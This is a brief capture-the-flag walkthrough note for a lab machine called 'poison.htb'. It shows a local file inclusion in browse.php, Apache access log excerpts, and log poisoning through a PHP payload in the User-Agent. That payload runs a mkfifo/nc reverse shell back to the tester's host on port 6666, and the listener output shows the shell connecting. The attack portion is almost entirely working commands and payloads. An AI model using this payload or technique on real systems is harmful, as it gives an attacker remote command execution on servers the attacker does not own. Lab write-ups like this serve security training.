6 foothold_3 log poisoning

# any random file
http://poison.htb/browse.php?file=kashz.php
# error returned back >
Warning: include(kashz.php): failed to open stream: No such file or directory in /usr/local/www/apache24/data/browse.php on line 2
Warning: include(): Failed opening 'kashz.php' for inclusion (include_path='.:/usr/local/www/apache24/data') in /usr/local/www/apache24/data/browse.php on line 2

# apache log file freebsd is at /var/log/httpd-access.log
shows logs but the user-agent is also being recorded
92.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.16.5 - - [21/Sep/2021:02:03:59 +0200] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.16.5 - - [21/Sep/2021:02:03:59 +0200] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69875 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.16.5 - - [21/Sep/2021:02:03:59 +0200] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69875 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"

# injecting a useragent with php code
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 6666 >/tmp/f') ?>

poison.htb/browse.php?file=/var/log/httpd-access.log

$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.84] 46109
sh: can't access tty; job control turned off
$ whoami

Last updated